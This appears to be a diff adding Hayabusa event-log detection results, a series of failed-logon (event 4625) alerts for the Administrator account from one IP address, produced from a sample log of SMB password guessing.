+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
